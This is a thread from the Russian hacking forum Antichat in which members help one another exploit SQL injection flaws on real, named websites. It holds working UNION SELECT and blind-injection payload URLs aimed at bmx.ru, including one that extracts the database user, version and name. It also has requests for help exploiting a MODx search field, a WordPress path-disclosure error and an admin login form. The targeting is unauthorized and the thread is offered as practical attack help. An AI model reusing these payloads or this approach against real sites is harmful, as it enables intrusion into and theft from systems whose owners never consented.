Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.11.2009, 16:27
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от [QwyZ]
ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю
читай маны 
например тут:
http://forum.antichat.ru/thread19844.html
или тут:
http://forum.antichat.ru/thread43966.html
Последний раз редактировалось gisTy; 01.11.2009 в 16:32..
|
|
|
01.11.2009, 16:28
|
|
Участник форума
Регистрация: 07.01.2008
Сообщений: 187
Провел на форуме:
2809557
Репутация:
126
|
|
Wordpress 2.5
При обращении к файлу
http://localhost/blog/wp-includes/class-feed.php
имеем
Warning: require_once(ABSPATHWPINC/class-simplepie.php) [function.require-once]: failed to open stream: No such file or directory in T:\home\localhost\blog\wp-includes\class-feed.php on line 4
Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHWPINC/class-simplepie.php' (include_path='.;/usr/local/PHP/PEAR;/usr/local/PHP/Smarty') in T:\home\localhost\blog\wp-includes\class-feed.php on line 4
Можно это как-то раскрутить, без параметра? |
|
|
|
01.11.2009, 16:29
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от [QwyZ]
короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:
« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;
вводил в поле поиска - ">'>sc"><
Тебе вот сюда . 
|
|
|
|
01.11.2009, 16:30
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от acdel
Можно это как-то раскрутить, без параметра?
я думаю, что нет
|
|
|
|
01.11.2009, 17:32
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Прошу помощи. Нашёл следующую скулю:
Код:
http://www.bmx.ru/files.php?id=1'
Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
Код:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--
Не могу выполнить запрос! SELECT * FROM bmx_files WHERE razd_id = 1 union select 1,1,1,1-- ORDER BY id DESC
Пробую подобрать дальше, выскакивает другая ошибка:
Не могу выполнить запрос! SELECT * FROM bmx_razds_f WHERE id = 1 union select 1,1,1,1,1--
Это не операбельно, или у меня совсем мозг не работает уже? |
|
|
|
01.11.2009, 17:50
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от keng
Прошу помощи. Нашёл следующую скулю:
Код:
http://www.bmx.ru/files.php?id=1'
Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
Код:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--
Пробую подобрать дальше, выскакивает другая ошибка:
Это не операбельно, или у меня совсем мозг не работает уже? думаю ее просто нужно крутить как слепую
Код:
http://www.bmx.ru/files.php?id=1+and+1=1+--+
Код:
http://www.bmx.ru/files.php?id=1+and+1=0+--+
|
|
|
|
01.11.2009, 18:04
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от nemaniak
думаю ее просто нужно крутить как слепую
Код:
http://www.bmx.ru/files.php?id=1+and+1=1+--+
Код:
http://www.bmx.ru/files.php?id=1+and+1=0+--+
Я тоже об этом думал. Раз нет других вариантов - буду так. Большое спасибо!
|
|
|
|
01.11.2009, 18:07
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
keng
как вариант:
Код:
http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6--
|
|
|
|
01.11.2009, 18:09
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от z00MAN
keng
как вариант:
Код:
http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6--
Благодарю!
|
|
|
|
01.11.2009, 18:45
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989
Репутация:
3
|
|
Есть сайт!есть админка.в поле login ввожу ковычку.выдаёт Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/data/www/includes/functions_mysql.php on line 67.Что можно сделать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
